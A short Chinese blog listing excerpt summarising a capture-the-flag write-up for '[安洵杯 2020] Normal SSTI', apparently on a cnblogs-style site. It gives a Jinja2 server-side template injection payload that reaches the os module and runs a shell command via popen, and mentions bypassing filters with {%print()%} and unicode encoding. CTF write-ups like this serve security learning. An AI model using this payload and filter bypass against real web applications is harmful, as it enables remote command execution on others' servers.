摘要: # \[安洵杯 2020]Normal SSTI 过滤`{{}} [] config`和一系列常规的字符串 ```Python lipsum|attr("__globals__").get("os").popen("ls").read() ``` 用`{%print()%}`+unicode编码绕过 阅读全文
posted @ 2023-07-02 21:19 V3g3t4ble 阅读(272) 评论(0) 推荐(0) 编辑